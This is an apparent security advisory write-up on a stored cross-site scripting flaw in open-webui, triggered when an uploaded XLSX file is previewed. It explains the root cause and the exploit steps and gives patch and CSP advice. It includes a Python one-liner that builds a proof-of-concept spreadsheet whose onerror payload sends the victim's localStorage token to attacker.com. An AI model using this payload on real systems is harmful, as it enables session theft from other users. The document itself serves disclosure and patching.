Listen to this Post
The vulnerability arises from improper sanitization of HTML generated from XLSX file attachments. When a user uploads a maliciously crafted Excel file, the application uses the SheetJS library’s `sheet_to_html` function to convert the spreadsheet into an HTML string. This function does not validate or escape cell contents, allowing an attacker to embed JavaScript payloads (e.g., <img src=x onerror="alert(...)">) inside rich text or cell values. The resulting HTML is stored in the `excelHtml` variable and later injected directly into the Document Object Model (DOM) via Svelte’s `{@html}` directive when the “Preview” tab is selected. No filtering or sanitization (e.g., DOMPurify) is applied before assignment, so the payload executes in the context of the victim’s session. The attack can be distributed by sharing a chat containing the malicious attachment. Once a victim opens the file modal and clicks preview, the XSS triggers, potentially leading to session theft, data exfiltration, or further exploitation (including RCE for admins via chaining with GHSA-w7xj-8fx7-wfch).
dailycve form:
Platform: open-webui
Version: prior to fix
Vulnerability: XSS via XLSX
Severity: High
date: 2024-10-22
Prediction: 2024-10-30
What Undercode Say:
Audit for unsafe {@html} usage
grep -r "@html" src/lib/components/common/ --include=".svelte"
Verify DOMPurify integration in preview component
cat src/lib/components/common/FileItemModal.svelte | grep -A5 -B5 "excelHtml"
Generate test payload (python3)
python3 -c "
import xlsxwriter
wb = xlsxwriter.Workbook('poc.xlsx')
ws = wb.add_worksheet()
ws.write_rich_string('A1', '', wb.add_format(), '<img src=x onerror=fetch(\\'https://attacker.com/steal?c=\'+btoa(localStorage.token))>')
wb.close()
"
Exploit:
Craft XLSX with rich string or formula cell containing JavaScript event handler (e.g., onerror, onload). Upload as chat attachment. Share chat link. Victim opens file modal → clicks Preview → unsanitized HTML renders payload → attacker steals session token or performs actions on behalf of victim.
Protection from this CVE:
- Apply patch updating `FileItemModal.svelte` to sanitize `excelHtml` with `DOMPurify.sanitize()` before DOM insertion.
- Upgrade to open-webui version > affected commit (a727153).
- Implement Content Security Policy (CSP) restricting `script-src` and
unsafe-inline. - Disable preview of untrusted Excel files or require user confirmation.
Impact:
- Session hijacking – attacker reads localStorage token, exfiltrates to remote server.
- Data theft – access chat history, files, and user metadata.
- Privilege escalation – admin session can chain with GHSA-w7xj-8fx7-wfch to achieve RCE.
- Malware distribution – payload redirects victim to drive-by download.
- Widespread via shared chats – low-privilege users can target other users, including admins.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
